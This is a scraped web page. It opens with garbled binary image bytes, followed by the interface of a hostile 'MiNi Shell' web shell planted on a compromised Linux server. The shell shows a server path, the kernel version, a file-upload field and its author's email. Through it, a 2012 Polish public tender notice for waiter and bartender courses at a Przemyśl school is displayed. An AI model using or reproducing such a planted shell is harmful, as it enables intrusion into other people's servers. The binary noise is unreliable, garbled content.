JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120105/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120105/5461-N-2012.html

<p class="kh_header"><b>Przemyśl: Zorganizowanie i przeprowadzenie kursów kelnerskich i barmańskich w ramach projektu Szansa sukcesu</b><br>
<b>Numer ogłoszenia: 5461 - 2012; data zamieszczenia: 05.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Usługowo-Hotelarskich i Gastronomicznych , ul. Bakończycka 11, 37-700 Przemyśl, woj. podkarpackie, tel. 0-16 6788486, faks 0-16 6788486.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zsu-hig.edu.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.zsu-hig.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Zespół szkół ponadgimnazjalnych.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie kursów kelnerskich i barmańskich w ramach projektu Szansa sukcesu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie certyfikowanych kursów kelnerskich (część I) i barmańskich (część II) dla uczniów i uczennic Zespołu Szkół Usługowo-Hotelarskich i Gastronomicznych w Przemyślu w ramach projektu Szansa sukcesu  współfinansowanych przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Priorytetu IX Rozwój wykształcenia i kompetencji w regionach Działania 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego, nr Konkursu 16/POKL/9.2/2010.  Kursy mają na celu podniesienie zdolności uczniów do przyszłego zatrudnienia, samozatrudnienia i zwiększenia ich szans na rynku pracy. Kursy przeprowadzone będą w siedzibie Zamawiającego.  Wykonawca nie ponosi kosztów wynajęcia sali.
Część I (kurs kelnerski).
1.	Kurs kelnerski (min. 30 godzin na grupę) dla 80 uczniów przeprowadzony w czterech grupach kursowych (20 osobowych) w systemie piątkowo-sobotnio-niedzielnym 
(bądź innym w okresie ferii zimowych uzgodnionym z Zamawiającym) w terminach:
2 grupy - po 30 godzin zajęć przeprowadzonych w terminach od lutego do końca czerwca 2012r. (zajęcia w piątki od. godz. 15.00-19.00, soboty od godz. 9.00-15.00, niedziele od godz. 9.00-14.00   - dopuszcza się przeprowadzenie kursów w innych dniach w okresie ferii zimowych),
2 grupy - po 30 godzin zajęć przeprowadzonych od stycznia 2013r. do  
końca czerwca 2013r. . (zajęcia w piątki od. godz. 15.00-19.00, soboty od godz. 9.00-15.00, niedziele od godz. 9.00-14.00   - dopuszcza się przeprowadzenie kursów w innych dniach w okresie ferii zimowych)
2.	Minimalny zakres tematyczny kursu:
- sposoby obsługi konsumenta,
- sylwetka kelnera (ćwiczenia w noszeniu tacki, ćwiczenia z zakresu serwowania) - wizerunek zawodowy,
- wyposażenie służbowe kelnera,
- wyposażenie sali konsumenckiej (bielizna stołowa, zastawa stołowa, szkło, porcela-na, zasady nakrywania stołów, sztuka układania sztućców, serwetek, technika nosze-nia zastawy stołowej oraz tac),
- zasady obsługi gości przez kelnera (obsługa gości restauracyjnych - powitanie, ser-wis, podziękowanie i pożegnanie, zasady zbierania brudnych naczyń ze stołu, meto-dy serwowania), 
- formy przyjęć w zakładzie gastronomicznym,
- przeprowadzenie końcowego egzaminu wewnętrznego z zakresu stanowiącego przedmiot kursu.
3.	Wykonawca zapewni sprzęt i niezbędne materiały  do przeprowadzenia kursu (co najmniej karty dań, zastawa stołowa, sztućce, serwetki, bielizna stołowa, szkło), wraz 
z materiałami dydaktycznymi niezbędnymi do prawidłowej realizacji programu kursu - materiały dla uczestnika kursu.
4.	Wykonawca zobowiązuje się przeprowadzić łącznie min. 120 godzin zajęć dla czterech grup kursowych po 30 godzin dla każdej grupy. Wykonawca na okres trwania kursu wyposaży  salę szkoleniową w odpowiedni sprzęt niezbędny do przeprowadzenia kursu.
5.	Wykonawca przedłoży szczegółowy program kursu ze wskazaniem ilości godzin zajęć, uwzględniający zapisy w SIWZ.
6.	Po zakończeniu kursu Wykonawca wyda uczestnikom kursu zaświadczenie o ukończeniu kursu i certyfikat w języku polskim i angielskim posiadający logotypy Programu Operacyjnego Kapitał Ludzki i Unii Europejskiej - Europejskiego Funduszu Społecznego oraz zapis o współfinansowaniu kursu ze środków Unii Europejskiej w ra-mach Europejskiego Funduszu Społecznego - logotypy dostarczone przez Zamawiającego.
7.	Wykonawca zobowiązany jest do zapewnienia warunków zgodnych z przepisami BHP w trakcie trwania kursu.
8.	Dokumenty z kursu jakie winien przedłożyć Wykonawca po zakończeniu kursu:
a.	listy obecności uczestników kursu,
b.	protokół z egzaminu wewnętrznego z wynikami egzaminu,
c.	karta egzaminacyjna,
d.	dziennik zajęć,
e.	protokół odbioru zaświadczenia  i certyfikatów w języku polskim i angielskim,
f.	kserokopię zaświadczenia i certyfikatów w języku polskim i angielskim (po-świadczoną za zgodność z oryginałem).
Część II (kurs barmański).
1.	Kurs barmański (min. 30 godzin na grupę) dla 80 uczniów przeprowadzony w czte-rech grupach kursowych (20 osobowych) w systemie piątkowo-sobotnio-niedzielnym 
(bądź innym w okresie ferii zimowych uzgodnionym z Zamawiającym) w terminach:
2 grupy - po 30 godzin zajęć przeprowadzonych w terminach od lutego do końca czerwca 2012r. (zajęcia w piątki od. godz. 15.00-19.00, soboty od godz. 9.00-15.00, niedzie-le od godz. 9.00-14.00   - dopuszcza się przeprowadzenie kursów w innych dniach 
w okresie ferii zimowych),
2 grupy - po 30 godzin zajęć przeprowadzonych od stycznia 2013r. do  
końca czerwca 2013r. . (zajęcia w piątki od. godz. 15.00-19.00, soboty od godz. 9.00-15.00, niedziele od godz. 9.00-14.00   - dopuszcza się przeprowadzenie kursów w innych dniach w okresie ferii zimowych)
2.	Minimalny zakres tematyczny kursu:
- wyposażenie baru (prezentacja przyrządów barmana itp.),
- charakterystyka pracy (organizacja pracy w barze, ubiór barmana),
- napoje alkoholowe mieszane w barze (podział alkoholi na podstawowe grupy 
i rodzaje, charakterystyka piw - teorie , zasady - nalewanie alkoholi bezpośrednio 
z butelki bez miar barowych, przygotowanie klasycznych drinków),
- techniki miksowania i mieszania napojów,
- zasady sporządzania i podawania napojów - nauka pracy shakerami,
- przeprowadzenie końcowego egzaminu wewnętrznego z zakresu stanowiącego przedmiot kursu.
3.	Wykonawca zapewni sprzęt i niezbędne materiały  do przeprowadzenia kursu (co najmniej szkło, sprzęt barmański do ćwiczeń (wymieniony w pkt 4), owoce do dekoracji, napoje alkoholowe) wraz z materiałami dydaktycznymi niezbędnymi do prawidłowej realizacji programu kursu - materiały dla uczestnika kursu.
4.	Wykonawca zobowiązuje się przeprowadzić łącznie min. 120 godzin zajęć dla czte-rech grup kursowych po 30 godzin dla każdej grupy. Wykonawca na okres trwania kursu wyposaży  salę szkoleniową w odpowiedni sprzęt nie mniej niż: shakery - szt 2, miarki barmańskie - szt.2, łyżki barmańskie do stirowania - szt. 2 , szczypce o różnej wielkości - szt. 2, szkło barowe różnych wzorów do podawania napojów alkoholo-wych, bezalkoholowych i mieszanych - po 6 szt. , trybuszon - szt. 2, blender elek-tryczny- szt. 1, młynek do rozdrabniania lodu - szt. 1, zestaw noży dekoracyjnych - szt.2, dzbanki o różnej wielkości do kawy, soków i wody - szt. 6, cooler - szt. 2, mudler - szt. 1, kubki barmańskie - szt. 2 oraz surowce niezbędne do prawidłowej realizacji programu kursu.
5.	Wykonawca przedłoży szczegółowy program kursu ze wskazaniem ilości godzin za-jęć, uwzględniający zapisy w SIWZ.
6.	Po zakończeniu kursu Wykonawca wyda uczestnikom kursu zaświadczenie o ukoń-czeniu kursu  i certyfikat w języku polskim i angielskim posiadający logotypy Programu Operacyjnego Kapitał Ludzki i Unii Europejskiej - Europejskiego Funduszu Społecznego oraz zapis o współfinansowaniu kursu ze środków Unii Europejskiej 
w ramach Europejskiego Funduszu Społecznego dostarczone przez Zamawiającego.
7.	Wykonawca zobowiązany jest do zapewnienia warunków zgodnych z przepisami BHP w trakcie trwania kursu.
8.	Dokumenty z kursu jakie winien przedłożyć Wykonawca po zakończeniu kursu:
a.	listy obecności uczestników kursu,
b.	protokół z egzaminu wewnętrznego z wynikami egzaminu,
c.	karta egzaminacyjna,
d.	dziennik zajęć,
e.	protokół odbioru zaświadczeń i certyfikatów w języku polskim i angielskim,
f.	kserokopię zaświadczenia i certyfikatów w języku polskim i angielskim (po-świadczoną za zgodność z oryginałem)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca, który złoży stosowne oświadczenie, będzie spełniać ten warunek</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga ( dla wszystkich części zamówienia) - wykonania 
w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej czterech szkoleń grupowych min 20 godzinnych (gdzie grupa liczyła co najmniej 10 osób) odpowiadających swoim rodzajem usługom związanym z przedmiotem zamówienia. Przeprowadzone kursy  muszą odpowiadać części zamówienia, na którą Wykonawca złożył ofertę. Za spełnienie powyższego warunku Zamawiający uzna przedstawienie przez Wykonawcę wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania oferty, a jeżeli okres prowadzenia działalności lub wykonywania czynności jest krótszy - w tym okresie, z podaniem ich przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane należycie (np. odpowiednie referencje).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje potencjałem technicznym umożliwiającym wykonanie zamówienia. (Odpowiednia ilość narzędzi i wyposażenia). Za spełnienie powyższego warunku Zamawiający uzna przedstawienie przez Wykonawcę wykazu narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych Wykonawcy niezbędnych do realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien dysponować wykwalifikowaną kadrą dydaktyczną posiada-jącą co najmniej: 
-wykształcenie średnie,
-przygotowanie pedagogiczne,
-doświadczenie w prowadzeniu szkoleń o tematyce zgodnej z przedmiotem za-mówienia (co najmniej 3 szkolenia poprowadzone i zakończone). Za spełnienie powyższego warunku Zamawiający uzna przedstawienie przez Wykonawcę wykazu osób, które będą uczestniczyć w wykonaniu zamówienia (przewidzianych do prowadzenia kursów), wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informację o podstawie dysponowania tymi osobami.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca, który złoży stosowne oświadczenie, będzie spełniać ten warunek</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Doświadczenie - 40</li>
<li>3 - Certyfikat jakości - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zsu-hig.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Uslugowo-Hotelarskich i Gastronomicznych w Przemyślu, ul. Bakończycka 11, 37-700 Przemyśl - sekretariat..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.01.2012 godzina 09:30, miejsce: Zespół Szkół Uslugowo-Hotelarskich i Gastronomicznych w Przemyślu, ul. Bakończycka 11, 37-700 Przemyśl - sekretariat (sekretariat czynny od pon. do piątku w godz. 8.00-15.00).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Szansa sukcesu współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Priorytetu IX Rozwój wykształcenia i kompetencji w regionach Działania 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego, nr Konkursu 16/POKL/9.2/2010...</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com